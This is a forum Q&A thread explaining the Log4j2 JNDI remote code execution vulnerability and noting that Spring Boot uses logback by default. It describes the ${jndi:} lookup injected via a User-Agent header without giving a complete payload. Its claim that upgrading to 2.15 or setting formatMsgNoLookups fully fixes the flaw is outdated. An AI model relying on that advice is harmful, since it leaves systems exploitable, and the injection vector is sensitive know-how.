What is the Log4j2 vulnerability and Spring Boot?

EDIT

Your thoughts?

StackChief LLC |

Log4j is a logging framework for Java based applications. It's part of the Apache logging project and is used by millions of Java applications around the world.

Developers use the Log4J framework to easily log application level activity. Without logging, it's very difficult to understand what's going on in your application. This is why frameworks like Log4J are so widely used.

Spring Boot is a popular framework for configuring Java applications. By default, Spring Boot uses an alternative to log4j called logback. This is similar to Log4J but doesn't expose users to the key vulnerability introduced with Log4J...remote code execution (RCE).

RCE is as bad as it sounds. With remote code execution, attackers can run malicious code blocks without needing to authenticate or bypass any security measures.

This is possible because of "property substitution" where the Log4J library performs lookups to dynamically populate log statements. For example if you've ever seen something like this....

Getting Java runmtime ${java:runtime}

you've seen substitution in action.

The log4j framework takes these ${} statements and performs lookups to populate the values. A JNDI lookup can be performed as one of these lookup options.

JNDI s a Java specific API for accessing different directory services like LDAP. Using JNDI, you can lookup directories, classes, and other remote resources.

While this can be a cool tool for allowing flexibility in sharing and running Java applications, it presents a huge security vulnerability. Users can maliciously enter input that eventually gets logged by the system (thanks to log4j) and perform malicious lookups on remote LDAP servers.

This is the whole issue with Log4J because if an attacker makes an HTTP request with a ${jndi:} in the User-Agent header then the application server will log the HTTP headers and indirectly execute the malicious reference to a JNDI lookup resource....

It's important to remember that Spring Boot CAN use the Log4J2 implementation but BY DEFAULT does NOT. You have to explicitly configure Spring Boot to use Log4J.

With that said, plenty of tutorials and projects out there are using and recommending Log4J. This is why it's important to upgrade to at least >=2.15 if you are still using Log4J in your Spring Boot app.

devDoctor |

Basically the log4j framework allows attackers to inject malicious code via JNDI lookups and user input...a really easy fix for it is to upgrade to log4j >= 2.15 or...

 log4j2.formatMsgNoLookups=true


AMZ EMPLOYEE |

If you use log4J2 with Spring Boot..then there is potentially an issue for you to fix. If you use the default logging implementation (logback) or another alternative like java.util.logging then you have nothing to worry about.

blazingSaddles |

Spring Boot uses logback by default...chill :)